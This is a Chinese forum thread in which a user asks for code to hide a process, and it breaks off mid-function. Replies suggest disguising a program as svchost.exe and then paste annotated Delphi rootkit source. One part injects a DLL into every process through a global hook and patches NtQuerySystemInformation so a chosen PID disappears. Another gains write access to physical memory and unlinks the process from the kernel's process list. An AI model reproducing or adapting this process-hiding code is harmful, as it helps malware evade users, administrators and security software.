谁有进程隐藏的代码？在网上找了半天，都不好用。

解决方案 »

  1.   

    gyk120发表一篇帖子讨论了此问题,你参考一下:http://topic.csdn.net/u/20090803/10/75EF516D-A142-4873-A265-4CAC2466B771.html
      

  2.   

    现在大部分隐藏进程的代码都不好用了：技术进步了，杀软和 HIPS 也能查出来。
      

  3.   

    想了半天，把 title 设置成空，把程序名改成系统进程的名字（如 svchost.exe）。
    虽然没有真正隐藏，但也能糊弄一下，呵呵。
      

  4.   

    “三级跳”是 Win95 时代的技术，很古老了；2000 以后可以直接 DLL 注入，相当于三级跳的升级版。
      

  5.   

    无进程,无模块,Remoteshellcode
      

  6.   


    http://www.2ccc.com/article.asp?articleid=3763
    这个或许对你有帮助，但是程序被杀毒软件报得厉害。（下次多开点嘛。。）
      

  7.   

    下载不了  现在盒子算是废了 自从知道csdn 基本上就告别他了
      

  8.   

    我的qq1172024793 我在公司 上不了qq 发我qq邮箱吧
    可以上msn:[email protected]
      

  9.   

    { lhide.dll - user-mode "process hiding" DLL as posted on the forum (Delphi, Win32/x86).
      How it works (see the routines below):
        * HideProcess (exported) stores the PID to hide in a named section and installs a
          global WH_CBT hook, which makes Windows load this DLL into every GUI process.
        * On load (initialization block) each host process patches the import address
          table of all of its modules so that imports of ntdll!NtQuerySystemInformation
          point at myNtQuerySystemInfo, which drops the matching entry from the
          SystemProcessesAndThreadsInformation list.
      NOTE(review): annotated for analysis only; the code is left exactly as pasted.
      The paste collapsed several line breaks (e.g. "end;var", "TlHelp32;type"); these
      happen to remain valid Delphi, but "end.program load;" near the bottom is where a
      second file (the loader program) begins. }
    library lhide;uses
      Windows,
      ImageHlp,
      TlHelp32;type SYSTEM_INFORMATION_CLASS = (
    { Undocumented NtQuerySystemInformation information classes (NT4/2000-era names).
      Only the enumerator with ordinal 5, SystemProcessesAndThreadsInformation, is used
      (compared against in myNtQuerySystemInfo). }
    SystemBasicInformation,
    SystemProcessorInformation,
    SystemPerformanceInformation,
    SystemTimeOfDayInformation,
    SystemNotImplemented1,
    SystemProcessesAndThreadsInformation,
    SystemCallCounts,
    SystemConfigurationInformation,
    SystemProcessorTimes,
    SystemGlobalFlag,
    SystemNotImplemented2,
    SystemModuleInformation,
    SystemLockInformation,
    SystemNotImplemented3,
    SystemNotImplemented4,
    SystemNotImplemented5,
    SystemHandleInformation,
    SystemObjectInformation,
    SystemPagefileInformation,
    SystemInstructionEmulationCounts,
    SystemInvalidInfoClass1,
    SystemCacheInformation,
    SystemPoolTagInformation,
    SystemProcessorStatistics,
    SystemDpcInformation,
    SystemNotImplemented6,
    SystemLoadImage,
    SystemUnloadImage,
    SystemTimeAdjustment,
    SystemNotImplemented7,
    SystemNotImplemented8,
    SystemNotImplemented9,
    SystemCrashDumpInformation,
    SystemExceptionInformation,
    SystemCrashDumpStateInformation,
    SystemKernelDebuggerInformation,
    SystemContextSwitchInformation,
    SystemRegistryQuotaInformation,
    SystemLoadAndCallImage,
    SystemPrioritySeparation,
    SystemNotImplemented10,
    SystemNotImplemented11,
    SystemInvalidInfoClass2,
    SystemInvalidInfoClass3,
    SystemTimeZoneInformation,
    SystemLookasideInformation,
    SystemSetTimeSlipEvent,
    SystemCreateSession,
    SystemDeleteSession,
    SystemInvalidInfoClass4,
    SystemRangeStartInformation,
    SystemVerifierInformation,
    SystemAddVerifier,
    SystemSessionProcessesInformation
    );_IMAGE_IMPORT_DESCRIPTOR = packed record
    { PE import directory entry, same layout as IMAGE_IMPORT_DESCRIPTOR in WinNT.h.
      Name and FirstThunk are RVAs (added to the module base in ReplaceIATEntryInOneMod);
      the variant part mirrors the Characteristics/OriginalFirstThunk union. }
    case integer of
      0:(Characteristics: DWORD);
      1:(OriginalFirstThunk:DWORD; TimeDateStamp:DWORD; ForwarderChain: DWORD; Name: DWORD; FirstThunk: DWORD);
    end;
    IMAGE_IMPORT_DESCRIPTOR=_IMAGE_IMPORT_DESCRIPTOR;
    { ReplaceIATEntryInOneMod (declared at the end of the next line):
      in module hmodCaller, locate the import descriptor whose DLL name matches
      pszCallerModName (case-insensitive, lstrcmpiA), walk its IAT (FirstThunk array) and
      overwrite the first slot equal to pfnCurrent with pfnNew. Classic IAT patching.
        pszCallerModName - name of the imported DLL, e.g. 'ntdll.dll'
        pfnCurrent       - address the slot currently holds (the real export)
        pfnNew           - address to install
        hmodCaller       - base of the module whose IAT is patched
      Returns silently when the module has no import directory or does not import from
      pszCallerModName. Only the first matching slot is replaced.
      NOTE(review): an IAT slot pointing outside the named DLL's image, and an IAT page
      left PAGE_EXECUTE_READWRITE, are the usual detection signals for this hook. }
    PIMAGE_IMPORT_DESCRIPTOR=^IMAGE_IMPORT_DESCRIPTOR;PFARPROC=^FARPROC;procedure ReplaceIATEntryInOneMod(pszCallerModName: Pchar; pfnCurrent: FarProc; pfnNew: FARPROC; hmodCaller: hModule);
    var
      ulSize: ULONG;
      pImportDesc: PIMAGE_IMPORT_DESCRIPTOR;
      pszModName: PChar;
      pThunk: PDWORD; ppfn:PFARPROC;
      ffound: LongBool;
      written: DWORD;
    begin
      // TRUE: the module is mapped as an image, so RVAs can be added to the base directly
      pImportDesc:= ImageDirectoryEntryToData(Pointer(hmodCaller), TRUE,IMAGE_DIRECTORY_ENTRY_IMPORT, ulSize);
      if pImportDesc = nil then
        exit;
      // find the descriptor for pszCallerModName; the array ends with a zeroed entry
      while pImportDesc.Name <> 0 do begin
        pszModName := PChar(hmodCaller + pImportDesc.Name);
        if (lstrcmpiA(pszModName, pszCallerModName) = 0) then
          break;
        Inc(pImportDesc);
      end;
      if (pImportDesc.Name = 0) then
        exit;
      pThunk := PDWORD(hmodCaller + pImportDesc.FirstThunk);
      while pThunk^ <> 0 do begin
        ppfn := PFARPROC(pThunk);
        fFound := (ppfn^ = pfnCurrent);
        if (fFound) then begin
          // make the slot writable; the old protection is never restored, and 'written'
          // is reused here as the lpflOldProtect out-parameter
          VirtualProtectEx(GetCurrentProcess,ppfn,4,PAGE_EXECUTE_READWRITE,written);
          // 32-bit only: sizeof(pfnNew) = 4, matching the 4 bytes protected above
          WriteProcessMemory(GetCurrentProcess, ppfn, @pfnNew, sizeof(pfnNew), Written);
          exit;
        end;
        Inc(pThunk);
      end;
    end;var
      { Globals shared by the hook machinery (they follow the 'var' that ends the previous
        line). hideOnlyTaskMan points at the BOOL stored at offset 4 of the shared section
        view: when set, only a host named taskmgr.exe is patched (see initialization). }
      addr_NtQuerySystemInformation: Pointer;  // real ntdll!NtQuerySystemInformation, resolved in InterceptFunctions
      mypid: DWORD;                            // PID to hide; 0 in the controlling process (see HideProcess)
      fname: PCHAR;                            // host exe path buffer used by the initialization block (never freed)
      mapaddr: PDWORD;                         // view of the 'NtHideFileMapping' section: [0]=pid, [4]=BOOL taskmgr-only flag
      hideOnlyTaskMan: PBOOL;function myNtQuerySystemInfo(SystemInformationClass: SYSTEM_INFORMATION_CLASS; SystemInformation: Pointer;
    SystemInformationLength:ULONG; ReturnLength:PULONG):LongInt; stdcall;
    { myNtQuerySystemInfo - replacement for NtQuerySystemInformation installed in the IAT.
      Same signature and calling convention (stdcall) as the original. Forwards the call to
      the real function through addr_NtQuerySystemInformation and returns its status; when
      the class is SystemProcessesAndThreadsInformation and the call succeeded, it edits the
      returned buffer so that the entry whose PID equals mypid is skipped over.
      Buffer layout relied on: each entry starts with NextEntryOffset (offset 0, 0 ends
      the list) and the PID is read at offset 44h.
      NOTE(review): ESI, EBX, ECX and EDX are modified without being saved; stdcall callers
      expect EBX/ESI/EDI preserved, so this can corrupt state in the host process.
      NOTE(review): only code that imports the function by name through its IAT is
      affected; anything reaching ntdll another way (runtime GetProcAddress, the Zw alias,
      a direct syscall) still sees the process. }
    label onceagain, getnextpidstruct, quit, fillzero;
    asm
      push ReturnLength
      push SystemInformationLength
      push SystemInformation
      push dword ptr SystemInformationClass
      { call the real export with the caller's four arguments (stdcall: callee cleans up) }
      call dword ptr [addr_NtQuerySystemInformation]
      or eax,eax
      { negative NTSTATUS (failure, incl. STATUS_INFO_LENGTH_MISMATCH): return it untouched }
      jl quit
      cmp SystemInformationClass, SystemProcessesAndThreadsInformation
      jne quit  onceagain:
      { restart from the head after every edit; ebx = previous entry, esi = current entry }
      mov esi, SystemInformation  getnextpidstruct:
      mov ebx, esi
      cmp dword ptr [esi],0
      je quit
      { the head entry itself is never compared, only the entries following it }
      add esi, [esi]
      mov ecx, [esi+44h]
      cmp ecx, mypid
      jne getnextpidstruct
      mov edx, [esi]
      test edx, edx
      je fillzero
      { hidden entry is in the middle: previous.NextEntryOffset += hidden.NextEntryOffset }
      add [ebx], edx
      jmp onceagain  fillzero:
      { hidden entry is last (edx = 0): previous.NextEntryOffset := 0 terminates the list }
      and [ebx], edx
      jmp onceagain  quit:
      mov Result, eax
    end;procedure InterceptFunctions;
    { InterceptFunctions - hook the current process. Resolves the real export, snapshots
      this process's modules (TH32CS_SNAPMODULE) and patches the ntdll import slot in every
      module, ntdll's own included if it has one.
      NOTE(review): Module32First's return value is not checked; the repeat body runs at
      least once regardless. }
    var
      hSnapShot: THandle;
      me32: MODULEENTRY32;
    begin
      addr_NtQuerySystemInformation:=GetProcAddress(getModuleHandle('ntdll.dll'),'NtQuerySystemInformation');
      hSnapShot:=CreateToolHelp32SnapShot(TH32CS_SNAPMODULE,GetCurrentProcessId);
      if hSnapshot=INVALID_HANDLE_VALUE then
        exit;
      try
        ZeroMemory(@me32,sizeof(MODULEENTRY32));
        me32.dwSize:=sizeof(MODULEENTRY32);
        Module32First(hSnapShot,me32);
        repeat
          ReplaceIATEntryInOneMod('ntdll.dll',addr_NtQuerySystemInformation,@MyNtQuerySystemInfo,me32.hModule);
        until not Module32Next(hSnapShot,me32);
      finally
        CloseHandle(hSnapShot);
      end;
    end;procedure UninterceptFunctions;
    { UninterceptFunctions - reverse of InterceptFunctions: writes the real export back
      into every IAT slot that currently holds @MyNtQuerySystemInfo. Called from
      LibraryProc on DLL_PROCESS_DETACH in hooked processes. Same unchecked Module32First. }
    var
      hSnapShot: THandle;
      me32: MODULEENTRY32;
    begin
      addr_NtQuerySystemInformation:=GetProcAddress(getModuleHandle('ntdll.dll'),'NtQuerySystemInformation');
      hSnapShot:=CreateToolHelp32SnapShot(TH32CS_SNAPMODULE,GetCurrentProcessId);
      if hSnapshot=INVALID_HANDLE_VALUE then exit;
      try
        ZeroMemory(@me32,sizeof(MODULEENTRY32));
        me32.dwSize:=sizeof(MODULEENTRY32);
        Module32First(hSnapShot,me32);
      repeat
        ReplaceIATEntryInOneMod('ntdll.dll',@MyNtQuerySystemInfo,addr_NtQuerySystemInformation,me32.hModule);
      until not Module32Next(hSnapShot,me32);
      finally
        CloseHandle(hSnapShot);
      end;
    end;
    { HookHandle / CbtProc / InstallHook - the injection vehicle. SetWindowsHookEx(WH_CBT,
      ..., HInstance, 0) registers a desktop-wide CBT hook whose procedure lives in this DLL,
      so the DLL is mapped into every process on the desktop that raises CBT events.
      CbtProc itself does nothing and does not call CallNextHookEx, so other CBT hooks in
      the chain are not invoked while this one is installed.
      NOTE(review): a global CBT hook plus the fixed section name used below are the
      observable indicators of this technique. }
    var HookHandle: THandle;function CbtProc(code: integer; wparam: integer; lparam: integer):Integer; stdcall;
    begin
      Result:=0;
    end;procedure InstallHook; stdcall;
    begin
      HookHandle := SetWindowsHookEx(WH_CBT, @CbtProc, HInstance, 0);
    end;var hFirstMapHandle:THandle;procedure HideProcess(pid:DWORD); stdcall;
    { HideProcess - exported entry point called by the controlling process.
        pid - process id to hide in every hooked process.
      Creates (or opens) the pagefile-backed section 'NtHideFileMapping' ($FFFFFFFF is
      INVALID_HANDLE_VALUE; 8 bytes), writes pid at offset 0 and FALSE at offset 4 (the
      "only hook taskmgr.exe" flag read by the initialization block), then installs the hook.
      mypid := 0 marks this process as the controller for LibraryProc. hFirstMapHandle is
      deliberately kept open so the section outlives this call. LibraryProc would close it
      on detach, but the initialization block only assigns DLLProc when the section already
      exists at load time, so in the controller the handle simply lives until process exit. }
    var
      addrMap: PDWORD;
      ptr2: PBOOL;
    begin
      mypid:=0;
      hFirstMapHandle:=CreateFileMapping($FFFFFFFF,nil,PAGE_READWRITE,0,8,'NtHideFileMapping');
      if hFirstMapHandle=0 then
        exit;
      addrMap:=MapViewOfFile(hFirstMapHandle,FILE_MAP_WRITE,0,0,8);
      if addrMap=nil then begin
        CloseHandle(hFirstMapHandle);
        exit;
      end;
      addrMap^:=pid;
      // second DWORD: hideOnlyTaskMan flag; always FALSE here, so every hooked process is patched
      ptr2:=PBOOL(DWORD(addrMap)+4);
      ptr2^:= false;
      UnmapViewOfFile(addrMap);
      InstallHook;
    end;exports
      // the only export; the loader resolves it with GetProcAddress
      HideProcess;var
      hmap: THandle;procedure LibraryProc(Reason: Integer);
    { LibraryProc - DLL entry hook (assigned to DLLProc by the initialization block).
      On DLL_PROCESS_DETACH: hooked processes (mypid > 0) restore their IATs; otherwise the
      section handle is closed. Other reasons are ignored. }
    begin
      if Reason = DLL_PROCESS_DETACH then
        if mypid > 0 then
          UninterceptFunctions()
        else
          CloseHandle(hFirstMapHandle);
    end;function ExtractFileName(APath:string): string;
    { ExtractFileName - local stand-in for SysUtils.ExtractFileName (SysUtils is not used
      by this library): returns the text after the last '\', the whole string if there is
      none, '' for an empty input. Only the backslash is treated as a separator. }
    var
      LI,LJ: Integer;
    begin
      if Length(APath)<>0 then begin
        LJ:=0;
        for LI:=Length(APath) downto 1 do
          if APath[LI]='\' then begin
            LJ:=LI;
            Break;
          end;
        Result:=Copy(APath,LJ+1,MaxInt);
      end
      else
        Result := '';
    end;function AllocMem(Size: Cardinal): Pointer;
    { AllocMem - GetMem plus zero-fill; local stand-in for SysUtils.AllocMem. }
    begin
      GetMem(Result, Size);
      FillChar(Result^, Size, 0);
    end;begin
      { Library initialization: runs in every process this DLL is loaded into.
        If the named section does not exist yet we are in the controller (loaded via
        LoadLibrary before HideProcess ran): leave without installing anything and without
        assigning DLLProc. Otherwise read the PID and the taskmgr-only flag and hook this
        process.
        NOTE(review): the exe-name comparison is case-sensitive; fname is never freed; and
        when mapaddr is nil the finally block still calls UnmapViewOfFile(nil) and assigns
        DLLProc. }
      hmap:=OpenFileMapping(FILE_MAP_READ,false,'NtHideFileMapping');
      if hmap=0 then
        exit;
      try
        mapaddr:=MapViewOfFile(hmap,FILE_MAP_READ,0,0,0);
      if mapaddr=nil then
        exit;
      mypid:=mapaddr^;
      hideOnlyTaskMan:=PBOOL(DWORD(mapaddr)+4);
      if hideOnlyTaskMan^ then begin
        fname:=allocMem(MAX_PATH+1);
        GetModuleFileName(GetModuleHandle(nil),fname,MAX_PATH+1);
        if not (ExtractFileName(fname)='taskmgr.exe') then
          exit;
      end;
      InterceptFunctions;
      finally
        UnmapViewOfFile(mapaddr);
        CloseHandle(Hmap);
        DLLProc:=@LibraryProc;
      end;
    end.program load;
    { load.exe - minimal loader (a second file; its 'program load;' header is fused to the
      end of the previous line). Loads lhide.dll, calls its exported HideProcess with this
      process's own PID, then idles forever so the CBT hook stays installed.
      NOTE(review): 'lhide.dll' is resolved through the normal DLL search order (relative
      name), and neither LoadLibrary nor GetProcAddress is checked - a missing DLL or export
      leaves VHideProcess nil and the call faults. There is no message loop, only Sleep(1). }
    uses windows;
    var
    VHideProcess:procedure(pid:DWORD); stdcall;
    // HideProcess - resolve and call lhide.dll!HideProcess(pid); the module is never freed
    procedure HideProcess(pid:DWORD); stdcall;
    var
      hget:THandle;
    begin
      hget := LoadLibrary('lhide.dll');
      @VHideProcess := GetProcAddress(hget, 'HideProcess');
      VHideProcess(pid);
    end;
    begin
      HideProcess(GetCurrentProcessId);
      while True do Sleep(1);
    end.
      

  10.   

    { UnitHideProcess - Delphi transliteration of the well-known C "HideProcess" sample.
      TMyHideProcess.DoHideMe dispatches on the OS version given to the constructor:
        98   -> HideProcess98: kernel32!RegisterServiceProcess(RSP_SIMPLE_SERVICE)
        2000 -> HideProcess2000: open \Device\PhysicalMemory from user mode, grant the
                current user SECTION_MAP_WRITE on it if refused, translate kernel virtual
                addresses through the (non-PAE x86) page tables and unlink the current
                process block from the kernel's doubly-linked process list (DKOM).
      NOTE(review): annotated for analysis only; code left as pasted. User-mode opening of
      \Device\PhysicalMemory has been refused since Windows Server 2003 SP1, and every
      kernel offset below is hard-coded, so this only ever applied to Windows 2000 x86.
      NOTE(review): the paste fused keywords in "interfaceuses" (this line) and
      "implementationconstructor" (end of the class declaration); both need a line break
      to compile. The uses clause pulls in the whole VCL (Forms, Graphics, ...) although
      nothing visual is used. }
    unit UnitHideProcess;interfaceuses
    Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls,
    Forms, Dialogs, Registry, ComCtrls, StrUtils, StdCtrls,
    ToolWin, Menus, ImgList, ActnList, IniFiles, CheckLst, FileCtrl, Aclapi,
    Accctrl;
    type
    // Native API aliases. NOTE(review): the Windows USHORT is 16-bit (Word), not Byte; this
    // only matters if UNICODE_STRING fields are read from Delphi, which they are not here.
    NTSTATUS=Longint; 
    USHORT =Byte; 
    PWSTR=PWidechar;
    ULONG= Cardinal;
    HANDLE=Pointer;
    PVOID=Pointer;
    PCWSTR=PWidechar;
    PULONG=^ULONG ;
    HMODULE=THANDLE;const 
    // NOTE(review): $C0000022 does not fit a Longint; the comparison with a negative
    // NTSTATUS in OpenPhysicalMemory depends on how the compiler types this constant.
    STATUS_ACCESS_DENIED = $C0000022 ;
    RSP_SIMPLE_SERVICE = $00000001;      // RegisterServiceProcess: register as Win9x service
    RSP_UNREGISTER_SERVICE = $00000000 ; // RegisterServiceProcess: undo (unused here)
    type 
    { UNICODE_STRING and OBJECT_ATTRIBUTES as consumed by ZwOpenSection; filled by
      RtlInitUnicodeString and by OpenPhysicalMemory respectively. }
    _UNICODE_STRING= record
    Length:USHORT ;
    MaximumLength: USHORT;
    Buffer:PWSTR; 
    end;
    UNICODE_STRING= _UNICODE_STRING; 
    PUNICODE_STRING =^ _UNICODE_STRING ;_OBJECT_ATTRIBUTES =record 
    Length:ULONG ;
    RootDirectory:HANDLE;
    ObjectName:PUNICODE_STRING;
    Attributes:ULONG;
    SecurityDescriptor:PVOID;
    SecurityQualityOfService:PVOID ;
    end; 
    OBJECT_ATTRIBUTES=_OBJECT_ATTRIBUTES ; 
    POBJECT_ATTRIBUTES=^_OBJECT_ATTRIBUTES; ZWOPENSECTION=function( 
    // NOTE(review): declared PInteger but receives @g_hMPM (a THANDLE); compiles only
    // because @ yields an untyped pointer under the default $T- setting. PHandle matches.
    SectionHandle:PInteger; 
    DesiredAccess:ACCESS_MASK; 
    ObjectAttributes :POBJECT_ATTRIBUTES
    ): NTSTATUS; stdcall; 
    RTLINITUNICODESTRING=procedure( 
    DestinationString:PUNICODE_STRING; 
    SourceString :PCWSTR 
    );stdcall;TMyHideProcess=class
    { TMyHideProcess - holds the resolved ntdll entry points and the physical-memory
      section/view used by the Windows 2000 path.
        OSversion            - 98 or 2000, selects the technique in DoHideMe
        g_hNtDLL             - ntdll.dll module handle from InitNTDLL
        g_pMapPhysicalMemory - read-only view of physical page $30000 (used as page directory)
        g_hMPM               - handle to \Device\PhysicalMemory
      NOTE(review): Destroy is declared without 'override', so it hides TObject.Destroy and
      is not reached through Free; CloseNTDLL then never runs on Free. Create does not call
      inherited either. }
    private
    OSversion:Longint;
    RtlInitUnicodeString:RTLINITUNICODESTRING ;
    ZwOpenSection:ZWOPENSECTION;
    g_hNtDLL: HMODULE; 
    g_pMapPhysicalMemory:PVOID;
    g_hMPM :THANDLE ; 
    function InitNTDLL():bool; 
    procedure CloseNTDLL(); 
    procedure SetPhyscialMemorySectionCanBeWrited( hSection:THANDLE) ; 
    function OpenPhysicalMemory():THANDLE ;
    function LinearToPhys(BaseAddress:PULONG ; addr:PVOID):PVOID;
    function GetData(addr:PVOID ):ULONG; 
    function SetData( addr:PVOID; data:ULONG):bool; 
    function HideProcess2000():bool;
    procedure HideProcess98();
    public 
    constructor Create( theosver:Longint);
    destructor Destroy();
    procedure DoHideMe(); 
    end; implementationconstructor TMyHideProcess.Create( theosver:Longint);
    // TMyHideProcess.Create (header on the previous line): only records the OS version.
    begin
    OSversion:=theosver; 
    end; 
    { Destroy - releases ntdll. See the class declaration note: not an override, so it is
      only reached by an explicit Destroy call, not via Free. }
    destructor TMyHideProcess.Destroy(); 
    begin 
    CloseNTDLL(); 
    end; 
    { DoHideMe - dispatch on OSversion: 98 -> HideProcess98, 2000 -> HideProcess2000; any
      other value does nothing. HideProcess2000's Boolean result is discarded. }
    procedure TMyHideProcess.DoHideMe(); 
    begin 
    case (OSversion) of 
    98:
    HideProcess98();
    2000:
    HideProcess2000(); 
    end;
    end; function TMyHideProcess.InitNTDLL():bool; 
    { InitNTDLL - loads ntdll.dll and resolves RtlInitUnicodeString / ZwOpenSection into
      the fields. Returns FALSE only when LoadLibrary fails; the two GetProcAddress
      results are not checked. Local 'a' is unused. }
    var
    a:Longint;
    begin
    g_hNtDLL := 0; 
    g_pMapPhysicalMemory := nil; 
    g_hMPM := 0; 
    g_hNtDLL := LoadLibrary( 'ntdll.dll' ); 
    if (g_hNtDLL=0 ) then 
    begin 
    result:= FALSE; 
    exit; 
    end;
    @RtlInitUnicodeString := 
    GetProcAddress( g_hNtDLL, 'RtlInitUnicodeString'); @ZwOpenSection := 
    GetProcAddress( g_hNtDLL, 'ZwOpenSection'); result:= TRUE;
    end;
    { CloseNTDLL - FreeLibrary on the handle from InitNTDLL. g_hNtDLL is not reset to 0,
      so a second call (HideProcess2000 already calls this, Destroy calls it again) issues
      another FreeLibrary. }
    procedure TMyHideProcess.CloseNTDLL();
    begin
    if(g_hNtDLL <>0 ) then 
    begin
    FreeLibrary(g_hNtDLL); 
    end;
    end; 
    { SetPhyscialMemorySectionCanBeWrited - add an ACE granting SECTION_MAP_WRITE to the
      caller (trustee name 'CURRENT_USER') to the DACL of hSection, which must have been
      opened with READ_CONTROL or WRITE_DAC (see OpenPhysicalMemory). Failures are silent:
      every error path jumps to CleanUp.
      NOTE(review): pDacl, pNewDacl and pSD are passed by value where GetSecurityInfo and
      SetEntriesInAcl are expected to return pointers through them; depending on the
      AclAPI translation in use this either does not compile or leaves pDacl nil, in which
      case SetEntriesInAcl builds a DACL holding only the new ACE and SetSecurityInfo
      replaces the object's original DACL with it.
      NOTE(review): a user ACE granting map-write on \Device\PhysicalMemory is a durable,
      auditable artefact of this technique. }
    procedure TMyHideProcess.SetPhyscialMemorySectionCanBeWrited( hSection:THANDLE) ;
    label CleanUp; 
    var
    pDacl,pNewDacl: PACL ;
    pSD: PPSECURITY_DESCRIPTOR ; 
    dwRes : DWORD; 
    ea:EXPLICIT_ACCESS;begin 
    pDacl:=nil; 
    pNewDacl :=nil; 
    // read the current DACL of the kernel object
    pSD:=nil; dwRes:=GetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION, 
    nil,nil,pDacl,nil,pSD); if(dwRes<>ERROR_SUCCESS) then 
    begin 
    goto CleanUp; 
    end; 
    // one explicit ACE: grant (not deny) SECTION_MAP_WRITE, no inheritance, to the caller
    ZeroMemory(@ea, sizeof(EXPLICIT_ACCESS));
    ea.grfAccessPermissions := SECTION_MAP_WRITE;
    ea.grfAccessMode := GRANT_ACCESS; 
    ea.grfInheritance:= NO_INHERITANCE; 
    ea.Trustee.TrusteeForm := TRUSTEE_IS_NAME; 
    ea.Trustee.TrusteeType := TRUSTEE_IS_USER;
    // merge the ACE into the existing DACL, then write the result back to the object
    ea.Trustee.ptstrName := 'CURRENT_USER'; dwRes:=SetEntriesInAcl(1,@ea,pDacl,pNewDacl) ;
    if(dwRes<> ERROR_SUCCESS) then 
    begin 
    goto CleanUp; 
    end; dwRes:=SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION, nil,nil,pNewDacl,nil); if(dwRes<>ERROR_SUCCESS) then 
    begin 
    goto CleanUp;
    end; CleanUp: if(pSD<>nil) then 
    // buffers handed out by GetSecurityInfo / SetEntriesInAcl are LocalAlloc'd
    LocalFree(Ulong(pSD)); 
    if(pNewDacl<>nil) then 
    LocalFree(Ulong(pNewDacl));end; function TMyHideProcess.OpenPhysicalMemory():THANDLE ; 
    { OpenPhysicalMemory (header on the previous line) - open \Device\PhysicalMemory for
      read/write mapping and map one page at physical $30000 into g_pMapPhysicalMemory,
      which LinearToPhys treats as the page directory. Returns the section handle, or 0.
      If the first open is refused, re-open with READ_CONTROL or WRITE_DAC, widen the DACL
      (SetPhyscialMemorySectionCanBeWrited), close, and open again for mapping.
      NOTE(review): Delphi string literals have no backslash escapes, so the object name
      passed is literally \\Device\\PhysicalMemory (doubled), not \Device\PhysicalMemory.
      NOTE(review): "if status=0" gives up on STATUS_SUCCESS (0) and continues to
      MapViewOfFile when the open failed; the test looks inverted. The STATUS_ACCESS_DENIED
      comparison also depends on how $C0000022 is typed against a Longint. }
    var 
    status: NTSTATUS ;
    physmemString:UNICODE_STRING; 
    attributes:OBJECT_ATTRIBUTES; 
    begin 
    RtlInitUnicodeString(@physmemString, PCWSTR('\\Device\\PhysicalMemory')); attributes.Length := sizeof(OBJECT_ATTRIBUTES); 
    attributes.RootDirectory := nil; 
    attributes.ObjectName := @physmemString; 
    attributes.Attributes := 0; 
    attributes.SecurityDescriptor := nil;
    // first try: read/write mapping rights; fall back to rewriting the DACL if refused
    attributes.SecurityQualityOfService := nil; status := ZwOpenSection(@g_hMPM,SECTION_MAP_READ or SECTION_MAP_WRITE,@attributes); if(status = STATUS_ACCESS_DENIED) then 
    begin 
    status := ZwOpenSection(@g_hMPM,READ_CONTROL or WRITE_DAC,@attributes); 
    SetPhyscialMemorySectionCanBeWrited(g_hMPM); 
    CloseHandle(g_hMPM); 
    status :=ZwOpenSection(@g_hMPM,SECTION_MAP_READ or SECTION_MAP_WRITE,@attributes); 
    end; if status=0 then 
    begin 
    result:= 0; 
    exit; 
    end; g_pMapPhysicalMemory := MapViewOfFile( 
    g_hMPM,
    4, 
    0, 
    $30000, 
    $1000); if( g_pMapPhysicalMemory = nil ) then 
    begin 
    result:=0; 
    exit ;
    end; result:= g_hMPM;end; 
    //------------------------- helper type for indexing a ULONG pointer as an array --------------------------------- 
    type
    // indexed well past element 0 by LinearToPhys, so this relies on range checking being off
    TArrayULONG = array [0..0] of ULONG;
    PTArrayULONG= ^TArrayULONG; //---------------------------------------------------------- 
    { LinearToPhys - translate a 32-bit virtual address to a physical address by walking
      two-level (non-PAE) x86 page tables.
        BaseAddress - view of the page directory (g_pMapPhysicalMemory, physical $30000)
        addr        - virtual address to translate
      Returns the physical address, or 0 when the PDE or PTE is not present (bit 0 clear).
      4 MB pages (PDE bit 7, PS) are resolved without a page-table lookup; otherwise the
      page-table page is mapped read-only from the section to read the PTE.
      NOTE(review): the page-table view mapped below is only unmapped on the success
      path; the PTE-not-present path returns without UnmapViewOfFile, and MapViewOfFile's
      result is not nil-checked before use. PAE (3-level) layouts are not handled.
      "result:= 0" into a PVOID may need nil / Pointer(0) to compile. }
    function TMyHideProcess.LinearToPhys(BaseAddress:PULONG ; addr:PVOID):PVOID;
    var 
    VAddr,PGDE,PTE,PAddr,tmp:ULONG; 
    _PGDE:PULONG; begin 
    VAddr:=ULONG(addr);
    // PDE index = top 10 bits of the virtual address
    PGDE:=PTArrayULONG(BaseAddress)^[VAddr shr 22]; 
    if ((PGDE and 1)<>0) then 
    begin 
    tmp:=PGDE and $00000080; 
    if (tmp<>0) then 
    begin 
    // 4 MB page: frame from the PDE, low 22 bits from the address
    PAddr:=(PGDE and $FFC00000)+(VAddr and $003FFFFF); 
    end 
    else 
    begin 
    // 4 KB pages: PGDE is reused to hold the address of the mapped page-table page
    PGDE:=ULONG(MapViewOfFile(g_hMPM, 4, 0, PGDE and $fffff000, $1000)); 
    _PGDE:=PULONG(PGDE); 
    // PTE index = middle 10 bits
    PTE:=PTArrayULONG(_PGDE)^[(VAddr and $003FF000) shr 12]; 
    if ((PTE and 1)<>0) then 
    begin 
    PAddr:=(PTE and $FFFFF000)+(VAddr and $00000FFF); 
    UnmapViewOfFile(PVOID(PGDE)); 
    end 
    else 
    begin 
    result:= 0; 
    exit; 
    end; 
    end; 
    end 
    else
    begin 
    result:= 0; 
    exit; 
    end; 
    result:=PVOID(PAddr); 
    end; 
    { GetData - read one ULONG at kernel virtual address addr through physical memory:
      translate with LinearToPhys, map the containing 4 KB physical page read-only
      (access 4 = FILE_MAP_READ), index it by (phys and $FFF) shr 2, unmap.
      NOTE(review): the nil test is inverted - "if (tmp<>nil) then exit" returns 0 when
      the mapping succeeded and dereferences nil when it failed. A 0 from LinearToPhys
      (translation failure) is not checked and maps physical page 0 instead. }
    function
    TMyHideProcess.GetData(addr:PVOID ):ULONG; 
    var 
    phys,ret: ULONG; 
    tmp: PULONG ; 
    begin 
    phys:=ULONG(LinearToPhys(PULONG(g_pMapPhysicalMemory),PVOID(addr))); 
    tmp:=PULONG(MapViewOfFile(g_hMPM, 4, 0, phys and $fffff000, $1000)); 
    if (tmp<>nil) then 
    begin 
    result:=0; 
    exit; 
    end; 
    ret:=PTArrayULONG(tmp)^[(phys and $FFF) shr 2]; 
    UnmapViewOfFile(tmp); 
    result:=ret; 
    end; 
    { SetData - write the ULONG data at kernel virtual address addr: same translation and
      page mapping as GetData, but with FILE_MAP_WRITE. Returns TRUE after the write.
      NOTE(review): same inverted nil test as GetData - returns FALSE without writing when
      the mapping succeeded and dereferences nil when it failed. 'ret' is unused. }
    function TMyHideProcess.SetData( addr:PVOID; data:ULONG):bool; 
    var 
    phys,ret: ULONG; 
    tmp: PULONG ; 
    begin 
    phys:=ULONG(LinearToPhys(PULONG(g_pMapPhysicalMemory),PVOID(addr))); 
